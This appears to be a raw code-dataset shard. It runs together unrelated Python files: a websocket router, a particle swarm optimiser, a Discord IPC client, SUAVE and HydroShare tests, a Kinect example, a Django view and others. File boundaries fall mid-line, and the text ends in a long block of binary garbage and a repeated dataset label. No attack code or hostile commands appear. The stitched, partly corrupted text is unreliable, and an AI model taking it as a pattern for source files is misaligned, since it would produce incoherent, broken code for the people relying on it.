vmsUploaded = u'Cargado' vmsUploading = u'Cargando' vmtCustomGreeting = u'Saludo personalizado' vmtDefaultGreeting = u'Saludo predeterminado' vmtIncoming = u'correo de voz entrante' vmtOutgoing = u'Saliente' vmtUnknown = u'Desconocido' vssAvailable = u'Disponible' vssNotAvailable = u'No disponible' vssPaused = u'Interrumpida' vssRejected = u'Rechazada' vssRunning = u'En curso' vssStarting = u'Iniciando' vssStopping = u'Detenida' vssUnknown = u'Desconocido' """Websocket subscriber handler functions.""" from typing import List from starlette.websockets import WebSocket from notify_server.clients.queue_entry import QueueEntry from notify_server.clients.subscriber import Subscriber, create from robot_server.settings import get_settings async def handle_socket( websocket: WebSocket, topics: List[str]) -> None: """Handle a websocket connection.""" subscriber = create( get_settings().notification_server_subscriber_address, topics ) await route_events(websocket, subscriber) async def send(websocket: WebSocket, queue_entry: QueueEntry) -> None: """Send queue entry to web socket.""" await websocket.send_text(queue_entry.json()) async def route_events(websocket: WebSocket, subscriber: Subscriber) -> None: """Route events from subscriber to websocket.""" async for queue_entry in subscriber: await send(websocket, queue_entry) <filename>pso_numpy.py import numpy as np # This is a PSO(interia weight) variation... class Particle: """ Particle class represents a solution inside a pool(Swarm). """ def __init__(self, no_dim, x_range, v_range): """ Particle class constructor :param no_dim: int No of dimensions. :param x_range: tuple(double) Min and Max value(range) of dimension. :param v_range: tuple(double) Min and Max value(range) of velocity. """ self.x = np.random.uniform( x_range[0], x_range[1], (no_dim,) ) # particle position in each dimension... self.v = np.random.uniform( v_range[0], v_range[1], (no_dim,) ) # particle velocity in each dimension... self.pbest = np.inf self.pbestpos = np.zeros((no_dim,)) class Swarm: """ Swarm class represents a pool of solution(particle). """ def __init__(self, no_particle, no_dim, x_range, v_range, iw_range, c): """ Swarm class constructor. :param no_particle: int No of particles(solutions). :param no_dim: int No of dimensions. :param x_range: tuple(double) Min and Max value(range) of dimension. :param v_range: tuple(double) Min and Max value(range) of velocity. :param iw_range: tuple(double) Min and Max value(range) of interia weight. :param c: tuple(double) c[0] -> cognitive parameter, c[1] -> social parameter. """ self.p = np.array( [Particle(no_dim, x_range, v_range) for i in range(no_particle)] ) self.gbest = np.inf self.gbestpos = np.zeros((no_dim,)) self.x_range = x_range self.v_range = v_range self.iw_range = iw_range self.c0 = c[0] self.c1 = c[1] self.no_dim = no_dim def optimize(self, function, X, Y, print_step, iter): """ optimize is used start optimization. :param function: function Function to be optimized. :param X: input Used in forward pass. :param Y: target Used to calculate loss. :param print_step: int Print pause between two adjacent prints. :param iter: int No of iterations. """ for i in range(iter): for particle in self.p: fitness = function(X, Y, particle.x) if fitness < particle.pbest: particle.pbest = fitness particle.pbestpos = particle.x.copy() if fitness < self.gbest: self.gbest = fitness self.gbestpos = particle.x.copy() for particle in self.p: # Here iw is inertia weight... iw = np.random.uniform(self.iw_range[0], self.iw_range[1], 1)[0] particle.v = ( iw * particle.v + ( self.c0 * np.random.uniform(0.0, 1.0, (self.no_dim,)) * (particle.pbestpos - particle.x) ) + ( self.c1 * np.random.uniform(0.0, 1.0, (self.no_dim,)) * (self.gbestpos - particle.x) ) ) # particle.v = particle.v.clip(min=self.v_range[0], max=self.v_range[1]) particle.x = particle.x + particle.v # particle.x = particle.x.clip(min=self.x_range[0], max=self.x_range[1]) if i % print_step == 0: print("iteration#: ", i + 1, " loss: ", fitness) print("global best loss: ", self.gbest) def get_best_solution(self): """ :return: array of parameters/weights. """ return self.gbestpos <reponame>luizffgv/discordrp-mpris # References: # * https://github.com/discordapp/discord-rpc/tree/master/documentation/hard-mode.md # * https://github.com/discordapp/discord-rpc/tree/master/src # * https://discordapp.com/developers/docs/rich-presence/how-to#updating-presence-update-presence-payload-fields # * https://github.com/devsnek/discord-rpc/tree/master/src/transports/IPC.js # * https://github.com/devsnek/discord-rpc/tree/master/example/main.js from abc import ABCMeta, abstractmethod import asyncio from functools import wraps import json import logging import os import sys import struct from typing import cast, Any, Dict, Generator, Tuple import uuid OP_HANDSHAKE = 0 OP_FRAME = 1 OP_CLOSE = 2 OP_PING = 3 OP_PONG = 4 JSON = Dict[str, Any] Reply = Tuple[int, JSON] logger = logging.getLogger(__name__) # Commonly thrown exceptions when connection is lost. # Must be a tuple to be used in `except`. exceptions = (ConnectionResetError, BrokenPipeError, asyncio.IncompleteReadError) class DiscordRpcError(Exception): pass class AsyncDiscordRpc(metaclass=ABCMeta): """Work with an open Discord instance via its JSON IPC for its rich presence. In a blocking way. Classmethod `for_platform` will resolve to UnixAsyncDiscordIpc. Windows hasn't been implemented. Supports asynchronous context handler protocol. """ def __init__(self, client_id: str, *, loop: asyncio.AbstractEventLoop = None) -> None: self.client_id = client_id self.loop = loop @property @abstractmethod def connected(self): pass async def connect(self): await self._connect() await self._do_handshake() # logger.debug("connected via ID %s", self.client_id) @classmethod def for_platform(cls, client_id: str, platform=sys.platform, *, loop: asyncio.AbstractEventLoop = None, ) -> 'AsyncDiscordRpc': if platform == 'win32': return NotImplemented # async is a pain for windows pipes else: return UnixAsyncDiscordRpc(client_id) @abstractmethod async def _connect(self) -> None: pass async def _do_handshake(self) -> None: while True: ret_op, ret_data = await self.send_recv({'v': 1, 'client_id': self.client_id}, op=OP_HANDSHAKE) # {'cmd': 'DISPATCH', 'data': {'v': 1, 'config': {...}}, 'evt': 'READY', 'nonce': None} if ret_op == OP_FRAME and ret_data['cmd'] == 'DISPATCH' and ret_data['evt'] == 'READY': return else: # No idea when or why this occurs; just try again. if ret_data == {'message': "Cannot read property 'id' of undefined"}: await asyncio.sleep(0.3) continue if ret_op == OP_CLOSE: await self.close() raise RuntimeError(ret_data) @abstractmethod async def _write(self, date: bytes): pass @abstractmethod async def _recv(self, size: int) -> bytes: pass async def _recv_header(self) -> Tuple[int, int]: header = await self._recv_exactly(8) return cast(Tuple[int, int], struct.unpack("<II", header)) async def _recv_exactly(self, size: int) -> bytes: buf = b"" size_remaining = size while size_remaining: chunk = await self._recv(size_remaining) chunk_size = len(chunk) if chunk_size == 0: raise EOFError() buf += chunk size_remaining -= chunk_size return buf async def close(self) -> None: if not self.connected: return logger.warning("closing connection") try: await self.send({}, op=OP_CLOSE) finally: await self._close() @abstractmethod async def _close(self) -> None: pass async def __aenter__(self) -> 'AsyncDiscordRpc': return self async def __aexit__(self, *_) -> None: if self.connected: await self.close() async def send_recv(self, data: JSON, *, op=OP_FRAME) -> Reply: nonce = data.get('nonce') await self.send(data, op=op) while True: reply = await self.recv() if reply[1].get('nonce') == nonce: return reply else: logger.warning("received unexpected reply; %s", reply) async def send(self, data: JSON, *, op=OP_FRAME) -> None: logger.debug("sending %s", data) data_str = json.dumps(data, separators=(',', ':')) data_bytes = data_str.encode('utf-8') header = struct.pack("<II", op, len(data_bytes)) await self._write(header) await self._write(data_bytes) async def recv(self) -> Reply: """Receives a packet from discord. Returns op code and payload. """ op, length = await self._recv_header() payload = await self._recv_exactly(length) data = json.loads(payload.decode('utf-8')) logger.debug("received %s", data) return op, data async def set_activity(self, act: JSON) -> Reply: data = { 'cmd': 'SET_ACTIVITY', 'args': {'pid': os.getpid(), 'activity': act}, 'nonce': str(uuid.uuid4()) } return await self.send_recv(data) async def clear_activity(self) -> Reply: data = { 'cmd': 'SET_ACTIVITY', 'args': {'pid': os.getpid()}, 'nonce': str(uuid.uuid4()) } return await self.send_recv(data) def _disconnect_on_error(func): @wraps(func) def wrapper(unix_rpc, *args, **kwargs): try: return func(unix_rpc, *args, **kwargs) except exceptions: unix_rpc.reader.feed_eof() raise return wrapper class UnixAsyncDiscordRpc(AsyncDiscordRpc): reader = None writer = None @property def connected(self): return self.reader and not self.reader.at_eof() async def _connect(self) -> None: for path in self._iter_path_candidates(): if not os.path.exists(path): logger.debug("%r not found", path) continue logger.debug("Attempting to connecting to %r", path) try: self.reader, self.writer = \ await asyncio.open_unix_connection(path, loop=self.loop) except OSError as e: logger.error("failed to open {!r}: {}".format(path, e)) else: break else: raise DiscordRpcError("Failed to connect to a Discord pipe") @staticmethod def _iter_path_candidates() -> Generator[str, None, None]: env_keys = ('XDG_RUNTIME_DIR', 'TMPDIR', 'TMP', 'TEMP') for env_key in env_keys: base_path = os.environ.get(env_key) if base_path and base_path.endswith('snap.sublime-text'): base_path = base_path[:-17] if base_path: break else: base_path = "/tmp" sub_path_candidates = ("snap.discord", "app/com.discordapp.Discord", "") for sub_path in sub_path_candidates: dir_path = os.path.join(base_path, sub_path) if os.path.exists(dir_path): for i in range(10): yield os.path.join(dir_path, "discord-ipc-{}".format(i)) @_disconnect_on_error async def _write(self, data: bytes) -> None: self.writer.write(data) # await self.writer.drain() # exception will be caught in _recv_exactly @_disconnect_on_error async def _recv(self, size: int) -> bytes: return await self.reader.read(size) @_disconnect_on_error async def _recv_exactly(self, size: int) -> bytes: return await self.reader.readexactly(size) async def _close(self) -> None: self.reader.feed_eof() self.writer.write_eof() await self.writer.drain() # sears_haack.py # # Created: Feb 2021, <NAME> # Modified: # ---------------------------------------------------------------------- # Imports # ---------------------------------------------------------------------- import SUAVE from SUAVE.Core import Units from SUAVE.Core import Data import numpy as np import pylab as plt import copy, time import random from SUAVE.Attributes.Gases.Air import Air import sys #import vehicle file sys.path.append('../Vehicles') from Concorde import vehicle_setup, configs_setup def main(): # initialize the vehicle vehicle = vehicle_setup() # initalize the aero model aerodynamics = SUAVE.Analyses.Aerodynamics.Supersonic_Zero() aerodynamics.geometry = vehicle aerodynamics.settings.drag_coefficient_increment = 0.0000 aerodynamics.settings.span_efficiency = 0.95 aerodynamics.settings.wave_drag_type = 'Sears-Haack' aerodynamics.settings.volume_wave_drag_scaling = 2.3 # calibrated to Concorde results aerodynamics.initialize() #no of test points test_num = 3 #specify the angle of attack angle_of_attacks = np.linspace(-.0174,.0174*3,test_num)[:,None] #* Units.deg # Cruise conditions (except Mach number) state = SUAVE.Analyses.Mission.Segments.Conditions.State() state.conditions = SUAVE.Analyses.Mission.Segments.Conditions.Aerodynamics() state.expand_rows(test_num) # -------------------------------------------------------------------- # Initialize variables needed for CL and CD calculations # Use a pre-run random order for values # -------------------------------------------------------------------- Mc = np.array([[1.03 ], [1.5 ], [2.0]]) rho = np.array([[0.16], [0.16], [0.16]]) mu = np.array([[1.42e-05], [1.42e-05], [1.42e-05]]) T = np.array([[217.], [217.], [217.]]) pressure = np.array([[ 10000.], [ 10000.], [ 10000.]]) re = np.array([[6.0e6], [6.0e6], [6.0e6]]) air = Air() a = air.compute_speed_of_sound(T,pressure) re = rho*a*Mc/mu state.conditions.freestream.mach_number = Mc state.conditions.freestream.density = rho state.conditions.freestream.dynamic_viscosity = mu state.conditions.freestream.temperature = T state.conditions.freestream.pressure = pressure state.conditions.freestream.reynolds_number = re state.conditions.aerodynamics.angle_of_attack = angle_of_attacks # -------------------------------------------------------------------- # Surrogate # -------------------------------------------------------------------- #call the aero model results = aerodynamics.evaluate(state) #build a polar for the markup aero polar = Data() CL = results.lift.total CD = results.drag.total polar.lift = CL polar.drag = CD # load older results #save_results(polar) old_polar = load_results() # check the results check_results(polar,old_polar) return def load_results(): return SUAVE.Input_Output.SUAVE.load('sears_haack_results.res') def save_results(results): SUAVE.Input_Output.SUAVE.archive(results,'sears_haack_results.res') return def check_results(new_results,old_results): # check segment values check_list = [ 'lift', 'drag', ] # do the check for k in check_list: print(k) old_val = np.max( old_results.deep_get(k) ) new_val = np.max( new_results.deep_get(k) ) err = (new_val-old_val)/old_val print('Error at Max:' , err) assert np.abs(err) < 1e-6 , 'Max Check Failed : %s' % k old_val = np.min( old_results.deep_get(k) ) new_val = np.min( new_results.deep_get(k) ) err = (new_val-old_val)/old_val print('Error at Min:' , err) assert np.abs(err) < 1e-6 , 'Min Check Failed : %s' % k print('') return if __name__ == '__main__': main()"""Test LfD specific constructors for Actions.""" # Copyright (c) 2022, ABB # All rights reserved. # # Redistribution and use in source and binary forms, with # or without modification, are permitted provided that # the following conditions are met: # # * Redistributions of source code must retain the # above copyright notice, this list of conditions # and the following disclaimer. # * Redistributions in binary form must reproduce the # above copyright notice, this list of conditions # and the following disclaimer in the documentation # and/or other materials provided with the # distribution. # * Neither the name of ABB nor the names of its # contributors may be used to endorse or promote # products derived from this software without # specific prior written permission. # # THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" # AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE # IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE # ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE # LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL # DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR # SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER # CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, # OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF # THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. from bt_learning.learning_from_demo.demonstration import Action, EquivalentAction import numpy as np import quaternion class ActionTest(EquivalentAction): def __init__(self, actions): super().__init__(actions) def preconditions(self): pass def postconditions(self): pass def action_string(self): pass class ObservedActionTest(Action): def __init__(self): super().__init__('test_action', 'test_frame') self.n_targets = 2 # Poisition measurement noise standard deviation pos_stddev = 0.1 # Rotation measurement noise standard deviation rot_stddev = 0.1 # Targets at (0, 0, 0) and (1, 2, 3) with noise self.__targets = np.array([[0, 0, 0], [1, 2, 3]]) + pos_stddev*np.random.randn(2, 3) # First target is aligned with the frame rotation_vector1 = np.array([0, 0, 0]) # The second target is rotated 90 degrees around the y-axis with measurement # noise on the angle rotation_vector2 = np.array([0, 1, 0])*(np.pi/2 + rot_stddev*np.random.randn(1)) self.__target_orientations = quaternion.from_rotation_vector( np.stack([rotation_vector1, rotation_vector2])) def target_position(self, frame, i): """Define target at (0, 0, 0) and (1, 2, 3) with noise.""" return self.__targets[i] def target_orientation(self, frame, i): return self.__target_orientations[i] def test_combining_actions(): """Test means of the actions when building an EquivalentAction.""" # Create multiple instances of the same action with noise actions = [] for i in range(1000): # Many observations to reduce variance and random test failures actions.append(ObservedActionTest()) action = ActionTest(actions) # Actions should be summarized into two targets assert np.shape(action.targets) == (2, 3) assert np.shape(action.max_distance) == (2,) assert np.shape(action.target_orientations) == (2,) # Target positions close to (0, 0, 0) and (1, 2, 3) assert np.allclose(action.targets, np.array([[0, 0, 0], [1, 2, 3]]), rtol=0, atol=0.01) # Test orientations. Note that two quaternions q1 and q2 represent the same rotation # if either q1 == q2 or -q1 == q2. target_orientations = quaternion.from_rotation_vector(np.array([[0, 0, 0], [0, np.pi/2, 0]])) # Target orientation 1 close to being aligned assert quaternion.allclose( action.target_orientations[0], target_orientations[0], rtol=0, atol=0.06) or \ quaternion.allclose( -action.target_orientations[0], target_orientations[0], rtol=0, atol=0.06) # Target orientation 2 close to being aligned assert quaternion.allclose( action.target_orientations[1], target_orientations[1], rtol=0, atol=0.06) or \ quaternion.allclose( -action.target_orientations[1], target_orientations[1], rtol=0, atol=0.06) # nombres de variables anartz = "Mi nombre" # a = "Mi Nombre" <==== ¡¡¡ASI NO!!! food_today = "<NAME>" my_favourite_videogame = "<NAME>" # nombres de constantes EURO_PTS = 166.386 PI = 3.1415 SECONDS_PER_HOUR = 3600 # No podemos iniciar con un dígito # 0variable < ====== ¡¡¡ IMPOSIBLE !!! """ Diferencia entre variables con el mismo nombre pero variando algun caracter de minúscula / mayúscula """ Anartz = "Otro valor" # En este caso se diferencia por el PRIMER CARACTER print(anartz) # "Mi nombre" print(Anartz) # "Otro valor" # Ejemplos válidos """ No puede empezar con números No símbolos especiales a-z, A-Z, 0-9 (no empieza), _ """ food_list = "Lista de la comida" my_name_lastname = "<NAME>" PI = 3.1415 SECONDS_MINUTE = 60 # Ejemplos NO válidos # 0_ <=== ESTO NO ES POSIBLE # my-name-lastname # my! # SECONDS.MINUTE = 60 # SECONDS!MINUTE = 60<filename>hs_access_control/tests/test_create_group_2.py from django.test import TestCase from django.contrib.auth.models import Group from hs_core import hydroshare from hs_core.testing import MockIRODSTestCaseMixin from hs_access_control.tests.utilities import global_reset class T15CreateGroup(MockIRODSTestCaseMixin, TestCase): "Test creatng a group" def setUp(self): super(T15CreateGroup, self).setUp() global_reset() self.group, _ = Group.objects.get_or_create(name='Resource Author') self.admin = hydroshare.create_account( '<EMAIL>', username='admin', first_name='administrator', last_name='couch', superuser=True, groups=[] ) self.cat = hydroshare.create_account( '<EMAIL>', username='cat', first_name='not a dog', last_name='last_name_cat', superuser=False, groups=[] ) self.dog = hydroshare.create_account( '<EMAIL>', username='dog', first_name='<NAME>', last_name='last_name_dog', superuser=False, groups=[] ) self.meowers = self.cat.uaccess.create_group( title='meowers', description='We are the meowers') def test_01_default_group_ownership(self): "Defaults for group ownership are correct" cat = self.cat meowers = self.meowers self.assertTrue(cat.uaccess.owns_group(meowers)) self.assertTrue(cat.uaccess.can_change_group(meowers)) self.assertTrue(cat.uaccess.can_view_group(meowers)) self.assertTrue(meowers.gaccess.public) self.assertTrue(meowers.gaccess.discoverable) self.assertTrue(meowers.gaccess.shareable) def test_02_default_group_isolation(self): "Users with no contact with the group have appropriate permissions" # start up as an unprivileged user with no access to the group dog = self.dog meowers = self.meowers self.assertFalse(dog.uaccess.owns_group(meowers)) self.assertFalse(dog.uaccess.can_change_group(meowers)) self.assertTrue(dog.uaccess.can_view_group(meowers)) self.assertTrue(meowers.gaccess.public) self.assertTrue(meowers.gaccess.discoverable) self.assertTrue(meowers.gaccess.shareable) def test_03_change_group_not_public(self): "Can make a group not public" dog = self.dog meowers = self.meowers self.assertFalse(dog.uaccess.owns_group(meowers)) self.assertFalse(dog.uaccess.can_change_group(meowers)) self.assertTrue(dog.uaccess.can_view_group(meowers)) # now set it to non-public meowers.gaccess.public = False meowers.gaccess.save() # check flags self.assertFalse(meowers.gaccess.public) self.assertTrue(meowers.gaccess.discoverable) self.assertTrue(meowers.gaccess.shareable) # test that an unprivileged user cannot read the group now self.assertFalse(dog.uaccess.owns_group(meowers)) self.assertFalse(dog.uaccess.can_change_group(meowers)) self.assertFalse(dog.uaccess.can_view_group(meowers)) # django admin can still have access to the private group self.assertFalse(self.admin.uaccess.owns_group(meowers)) self.assertTrue(self.admin.uaccess.can_change_group(meowers)) self.assertTrue(self.admin.uaccess.can_view_group(meowers)) def test_03_change_group_not_discoverable(self): "Can make a group not discoverable" dog = self.dog meowers = self.meowers self.assertFalse(dog.uaccess.owns_group(meowers)) self.assertFalse(dog.uaccess.can_change_group(meowers)) self.assertTrue(dog.uaccess.can_view_group(meowers)) # now set it to non-discoverable meowers.gaccess.discoverable = False meowers.gaccess.save() # check flags self.assertTrue(meowers.gaccess.public) self.assertFalse(meowers.gaccess.discoverable) self.assertTrue(meowers.gaccess.shareable) # public -> discoverable; test that an unprivileged user can read the # group now self.assertTrue(dog.uaccess.can_view_group(meowers)) self.assertFalse(dog.uaccess.can_change_group(meowers)) self.assertFalse(dog.uaccess.owns_group(meowers)) # django admin has access to not discoverable group self.assertTrue(self.admin.uaccess.can_view_group(meowers)) self.assertTrue(self.admin.uaccess.can_change_group(meowers)) self.assertFalse(self.admin.uaccess.owns_group(meowers)) <filename>examples/examplePlaybackBodyTracker.py<gh_stars>100-1000 import sys import cv2 sys.path.insert(1, '../') import pykinect_azure as pykinect if __name__ == "__main__": video_filename = "output.mkv" # Initialize the library, if the library is not found, add the library path as argument pykinect.initialize_libraries(track_body=True) # Start playback playback = pykinect.start_playback(video_filename) playback_config = playback.get_record_configuration() # print(playback_config) playback_calibration = playback.get_calibration() # Start body tracker bodyTracker = pykinect.start_body_tracker(calibration=playback_calibration) cv2.namedWindow('Depth image with skeleton',cv2.WINDOW_NORMAL) while playback.isOpened(): # Get camera capture capture = playback.update() # Get body tracker frame body_frame = bodyTracker.update(capture=capture) # Get the colored depth ret, depth_color_image = capture.get_colored_depth_image() # Get the colored body segmentation ret, body_image_color = body_frame.get_segmentation_image() if not ret: continue # Combine both images combined_image = cv2.addWeighted(depth_color_image, 0.6, body_image_color, 0.4, 0) # Draw the skeletons combined_image = body_frame.draw_bodies(combined_image) # Overlay body segmentation on depth image cv2.imshow('Depth image with skeleton',combined_image) # Press q key to stop if cv2.waitKey(1) == ord('q'): breakimport pytest def test_import(): import pyfortune <reponame>wenbobuaa/pykit import unittest from kazoo.client import KazooClient from pykit import utdocker from pykit import ututil from pykit import zkutil dd = ututil.dd zk_tag = 'daocloud.io/zookeeper:3.4.10' zk_name = 'zk_test' class ZKTestBase(unittest.TestCase): @classmethod def setUpClass(cls): utdocker.pull_image(zk_tag) def setUp(self): utdocker.create_network() utdocker.start_container( zk_name, zk_tag, env={ "ZOO_MY_ID": 1, "ZOO_SERVERS": "server.1=0.0.0.0:2888:3888", }, port_bindings={2181: 21811} ) self.zk = KazooClient('127.0.0.1:21811') self.zk.start() self.zkauthed, _ = zkutil.kazoo_client_ext( {'hosts': '127.0.0.1:21811', 'auth': ('digest', 'xp', '123'), 'acl': (('xp', '123', 'cdrwa'), ('foo', 'bar', 'rw'))}) dd('start zk-test in docker') def tearDown(self): self.zk.stop() self.zkauthed.stop() utdocker.remove_container(zk_name) <filename>fairGAN_code/fairgan_generate_graph.py def discover_graph(): column_names = ['male', 'age', 'debt', 'married', 'bankcustomer', 'educationlevel', 'ethnicity', 'yearsemployed', 'priordefault', 'employed', 'creditscore', 'driverslicense', 'citizen', 'zip', 'income', 'approved'] data = pd.read_csv('data/crx.data', header=None, names=column_names) data.reset_index(drop=True, inplace=True) data = data.dropna(how = 'all') data = data[data.age != '?'] print( data.head() ) for feat in ['male', 'married','bankcustomer', 'educationlevel', 'ethnicity','priordefault', 'employed', 'driverslicense', 'citizen', 'zip', 'approved']: data[feat] = preprocessing.LabelEncoder().fit_transform(data[feat]) ##################################################### #### For this experiment, we uniquely drop the default variable (prior default) ################################################### #data = data.drop(['educationlevel'], axis=1) from pycausal.pycausal import pycausal as pc pc = pc() pc.start_vm() from pycausal import prior as p from pycausal import search as s prior = p.knowledge(addtemporal = [['male', 'age','ethnicity'],[ 'debt', 'married', 'bankcustomer', 'educationlevel', 'yearsemployed', 'employed', 'creditscore', 'driverslicense', 'citizen', 'zip', 'income'],['approved']]) tetrad = s.tetradrunner() tetrad.run(algoId = 'fges', scoreId = 'cg-bic-score', dfs = data, priorKnowledge = prior, maxDegree = -1, faithfulnessAssumed = True, verbose = False) tetrad.getEdges() edges = [] for edge in tetrad.getEdges(): edges.append(list([column_names.index(edge.split(' ')[0]), column_names.index(edge.split(' ')[-1])])) print(edges ) # Copy the above edge list column_names.index('male')from module.princess import unitproc from module.image import proc import cv2 report = cv2.imread("assets/b.png") # 讀取圖片 report = proc.preprocessing(report) # 中央視窗裁剪 report = proc.report_processing(report) # 傷害報告類型圖片處理 char_list = unitproc.process(report) # 角色頭像鎖定 for char in char_list: objUnit = unitproc.unit(char) objUnit.detect() result = objUnit.getResult() if result == False: print("找不到這角色") else: print(result)<filename>Web dev/Django/Projects/Sports_Resource_Booking/SportsResourceBooking/reserve/views.py<gh_stars>1-10 from django.shortcuts import render from .models import addDetails from django.utils.datastructures import MultiValueDictKeyError # Create your views here. def addInfo(request): try: noOfitems = request.POST['no_of_items'] except MultiValueDictKeyError: noOfitems = 0 try: times = request.POST['timings'] except MultiValueDictKeyError: times="00:00" try: equipment_type = request.POST['equipment_type'] except MultiValueDictKeyError: equipment_type = "none" obj = addDetails(idno=request.user.username,phno = request.user.last_name,equipment_type=equipment_type,noOfitems=noOfitems,times=times) obj.save() return render(request,'form.html') ��������&���9���L���_���r������������������������������� ����0��C��V��i��|������������������������'��:��M��`��s����������������������� ����1��D��W��j��}������������������������(��;��N��a��t����������������������� ����2��E��X��k��~������������������������)��<��O��b��u����������������������� �� ��3��F��Y��l��������������������������*��=��P��c��v����������������������� ��! ��4 ��G ��Z ��m ��� ��� ��� ��� ��� ��� ��� �� �� ��+ ��> ��Q ��d ��w ��� ��� ��� ��� ��� ��� ��� �� ��" ��5 ��H ��[ ��n ��� ��� ��� ��� ��� ��� ��� �� �� ��, ��? ��R ��e ��x ��� ��� ��� ��� ��� ��� ��� �� ��# ��6 ��I ��\ ��o ��� ��� ��� ��� ��� ��� ��� ������-��@��S��f��y�������������������������$��7��J��]��p���������������������������.��A��T��g��z�������������������������%��8��K��^��q����������������������� ����/��B��U��h��{�������������������������&��9��L��_��r����������������������� ����0��C��V��i��|������������������������'��:��M��`��s����������������������� ����1��D��W��j��}������������������������(��;��N��a��t����������������������� ����2��E��X��k��~������������������������)��<��O��b��u����������������������� �� ��3��F��Y��l��������������������������*��=��P��c��v�������������������������!��4��G��Z��m���������������������������+��>��Q��d��w�������������������������"��5��H��[��n���������������������������,��?��R��e��x����������������������� ��# ��6 ��I ��\ ��o ��� ��� ��� ��� ��� ��� ��� ��!��!��-!��@!��S!��f!��y!���!���!���!���!���!���!���!��"��$"��7"��J"��]"��p"���"���"���"���"���"���"���"��#��#��.#��A#��T#��g#��z#���#���#���#���#���#���#���#��$��%$��8$��K$��^$��q$���$���$���$���$���$���$���$�� %��%��/%��B%��U%��h%��{%���%���%���%���%���%���%���&��&��&&��9&��L&��_&��r&���&���&���&���&���&���&���&�� '��'��0'��C'��V'��i'��|'���'���'���'���'���'���'��(��(��'(��:(��M(��`(��s(���(���(���(���(���(���(���(�� )��)��1)��D)��W)��j)��})���)���)���)���)���)���)��*��*��(*��;*��N*��a*��t*���*���*���*���*���*���*���*�� +��+��2+��E+��X+��k+��~+���+���+���+���+���+���+��,��,��),��<,��O,��b,��u,���,���,���,���,���,���,���,�� -�� -��3-��F-��Y-��l-��-���-���-���-���-���-���-��.��.��*.��=.��P.��c.��v.���.���.���.���.���.���.���.��/��!/��4/��G/��Z/��m/���/���/���/���/���/���/���/��0��0��+0��>0��Q0��d0��w0���0���0���0���0���0���0���0��1��"1��51��H1��[1��n1���1���1���1���1���1���1���1��2��2��,2��?2��R2��e2��x2���2���2���2���2���2���2���2��3��#3��63��I3��\3��o3���3���3���3���3���3���3���3��4��4��-4��@4��S4��f4��y4���4���4���4���4���4���4���4��5��$5��75��J5��]5��p5���5���5���5���5���5���5���5��6��6��.6��A6��T6��g6��z6���6���6���6���6���6���6���6��7��%7��87��K7��^7��q7���7���7���7���7���7���7���7�� 8��8��/8��B8��U8��h8��{8���8���8���8���8���8���8���9��9��&9��99��L9��_9��r9���9���9���9���9���9���9���9�� :��:��0:��C:��V:��i:��|:���:���:���:���:���:���:��;��;��';��:;��M;��`;��s;���;���;���;���;���;���;���;�� <��<��1<��D<��W<��j<��}<���<���<���<���<���<���<��=��=��(=��;=��N=��a=��t=���=���=���=���=���=���=���=�� >��>��2>��E>��X>��k>��~>���>���>���>���>���>���>��?��?��)?��<?��O?��b?��u?���?���?���?���?���?���?���?�� @�� @��3@��F@��Y@��l@��@���@���@���@���@���@���@��A��A��*A��=A��PA��cA��vA���A���A���A���A���A���A���A��B��!B��4B��GB��ZB��mB���B���B���B���B���B���B���B��C��C��+C��>C��QC��dC��wC���C���C���C���C���C���C���C��D��"D��5D��HD��[D��nD���D���D���D���D���D���D���D��E��E��,E��?E��RE��eE��xE���E���E���E���E���E���E���E��F��#F��6F��IF��\F��oF���F���F���F���F���F���F���F��G��G��-G��@G��SG��fG��yG���G���G���G���G���G���G���G��H��$H��7H��JH��]H��pH���H���H���H���H���H���H���H��I��I��.I��AI��TI��gI��zI���I���I���I���I���I���I���I��J��%J��8J������StarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPy